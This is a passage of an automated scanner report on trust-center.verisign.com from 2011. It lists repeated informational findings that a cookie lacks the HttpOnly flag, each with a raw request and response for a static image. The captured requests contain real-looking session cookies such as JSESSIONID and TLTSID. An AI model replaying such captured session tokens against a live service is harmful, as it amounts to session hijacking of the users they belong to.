Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

...[SNIP]...

10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
